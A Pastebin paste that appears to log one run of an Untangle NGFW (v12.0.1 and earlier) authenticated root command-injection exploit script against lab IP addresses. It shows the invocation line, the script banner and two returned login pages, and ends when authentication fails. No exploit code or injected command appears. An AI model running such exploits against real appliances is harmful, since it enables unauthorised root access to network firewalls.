Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- python 40030.py 192.168.242.151 192.168.242.130 root admin
- Untangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit
- by @3xocyte
- [*] Opening session...
- [*] Authenticating...
- Logging in...
- login: <Response [200]>
- login.text: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Untangle Administrator Login</title>
- <script type="text/javascript">if (top.location!=location) top.location.href=document.location.href;</script>
- <style type="text/css">
- /* <![CDATA[ */
- @import url(/images/base.css);
- /* ]]> */
- </style>
- </head>
- <body class="loginPage">
- <div id="main" style="width: 500px; margin: 50px auto 0 auto;">
- <form method="post" action="/auth/login?url=/webui&realm=Administrator" class="form-signin">
- <center>
- <img style="margin-bottom:10px;" src="/images/BrandingLogo.png"><br/>
- <span class="form-signin-heading"><strong>Untangle Administrator Login</strong></span>
- <br/>
- <div class="banner"></div>
- <br/>
- <span><strong><b style="color:#f00">Error: Username and Password do not match</b><br/><br/></strong></span>
- <table>
- <tbody>
- <tr><td style="text-align:right;color:white;">Server:</td><td><em><font color="white"> 192.168.242.151</font></em></td></tr>
- <tr><td style="text-align:right;color:white;">Username:</td><td><input id="username" type="text" name="username" value="admin" class="input-block-level"/></td></tr>
- <tr><td style="text-align:right;color:white;">Password:</td><td><input id="password" type="password" name="password" class="input-block-level"/></td></tr>
- </tbody>
- </table>
- <br/>
- <div style="text-align: center;color:white;"><button value="login" type="submit">Login</button></div>
- </center>
- </form>
- <script type="text/javascript">document.getElementById('password').focus();</script>
- </div>
- </body>
- </html>
- Posting to RPC URL...
- req_nonce: <Response [200]>
- req_nonce.text: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title>Untangle Administrator Login</title>
- <script type="text/javascript">if (top.location!=location) top.location.href=document.location.href;</script>
- <style type="text/css">
- /* <![CDATA[ */
- @import url(/images/base.css);
- /* ]]> */
- </style>
- </head>
- <body class="loginPage">
- <div id="main" style="width: 500px; margin: 50px auto 0 auto;">
- <form method="post" action="/auth/login?url=/webui/JSON-RPC&realm=Administrator" class="form-signin">
- <center>
- <img style="margin-bottom:10px;" src="/images/BrandingLogo.png"><br/>
- <span class="form-signin-heading"><strong>Untangle Administrator Login</strong></span>
- <br/>
- <div class="banner"></div>
- <br/>
- <span><strong></strong></span>
- <table>
- <tbody>
- <tr><td style="text-align:right;color:white;">Server:</td><td><em><font color="white"> 192.168.242.151</font></em></td></tr>
- <tr><td style="text-align:right;color:white;">Username:</td><td><input id="username" type="text" name="username" value="admin" class="input-block-level"/></td></tr>
- <tr><td style="text-align:right;color:white;">Password:</td><td><input id="password" type="password" name="password" class="input-block-level"/></td></tr>
- </tbody>
- </table>
- <br/>
- <div style="text-align: center;color:white;"><button value="login" type="submit">Login</button></div>
- </center>
- </form>
- <script type="text/javascript">document.getElementById('password').focus();</script>
- </div>
- </body>
- </html>
- Parsing JSON response...
- No JSON object could be decoded
- [!] Authentication failed. Quitting.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement